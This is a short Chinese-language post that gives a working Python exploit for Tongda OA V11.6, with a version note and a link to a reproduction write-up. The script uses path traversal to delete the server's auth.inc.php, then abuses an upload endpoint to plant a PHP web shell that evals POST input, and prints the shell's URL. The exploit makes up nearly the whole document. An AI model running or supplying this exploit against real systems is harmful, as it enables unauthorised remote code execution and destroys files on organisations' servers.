http://www.kxdw.com/soft/23114.html
    漏洞影响版本:通达 OA V11.6
    复现文章地址:https://blog.csdn.net/God_XiangYu/article/details/108091470
    复现前记得备份:webroot\inc 下将auth.inc.php备份一下

    1. import requests
    2. target="http://192.168.159.137:8080/"
    3. payload="<?php eval($_POST['agan']);?>"
    4. print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
    5. input("Press enter to continue")
    6. print("[*]Deleting auth.inc.php....")
    7. url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
    8. requests.get(url=url)
    9. print("[*]Checking if file deleted...")
    10. url=target+"/inc/auth.inc.php"
    11. page=requests.get(url=url).text
    12. if 'No input file specified.' not in page:
    13. print("[-]Failed to deleted auth.inc.php")
    14. exit(-1)
    15. print("[+]Successfully deleted auth.inc.php!")
    16. print("[*]Uploading payload...")
    17. url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
    18. files = {'FILE1': ('agan.php', payload)}
    19. requests.post(url=url,files=files)
    20. url=target+"/_agan.php"
    21. page=requests.get(url=url).text
    22. if 'No input file specified.' not in page:
    23. print("[+]Filed Uploaded Successfully")
    24. print("[+]URL:",url)
    25. else:
    26. print("[-]Failed to upload file")

    应该属于任意文件删除+有限制的文件上传,导致RCE